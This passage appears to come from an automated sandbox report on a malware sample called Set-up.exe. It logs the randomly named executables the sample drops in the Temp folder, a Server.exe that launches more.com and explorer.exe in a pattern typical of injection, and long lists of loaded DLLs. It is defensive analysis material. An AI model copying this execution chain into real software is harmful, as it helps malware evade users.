                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\rareTemp.exe "C:\Users\user\AppData\Local\Temp\rareTemp.exe"
                  Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe "C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe "C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                  Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ?????? .dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeSection loaded: fswwa.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_system.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dvacore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dvamediatypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dvatransport.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dvamarshal.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dynamiclink.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: imagerenderer.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: prm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: aslfoundation.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: aslmessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: mediafoundation.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: videoframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: msvcp100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_date_time.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_date_time.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: mc_enc_dv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: libmmd.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: svml_dispmd.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_date_time.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: aslunittesting.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_date_time.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: memory.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: xmllite.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_system.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dvacore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dvamediatypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dvatransport.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dvamarshal.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dynamiclink.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: imagerenderer.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: prm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: aslfoundation.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: aslmessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: mediafoundation.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: videoframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: msvcp100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_date_time.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_date_time.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: mc_enc_dv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: libmmd.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: svml_dispmd.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_date_time.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: aslunittesting.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_date_time.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: memory.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: msftedit.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: comsvcs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: cmlua.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: cmutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_system.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dvacore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dvamediatypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dvatransport.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dvamarshal.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dynamiclink.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: imagerenderer.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: prm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: aslfoundation.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: aslmessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: mediafoundation.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: videoframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: msvcp100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_date_time.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_date_time.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: mc_enc_dv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: libmmd.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: svml_dispmd.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_date_time.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_date_time.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: boost_threads.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: aslunittesting.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: memory.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: cabinet.dllJump to behavior
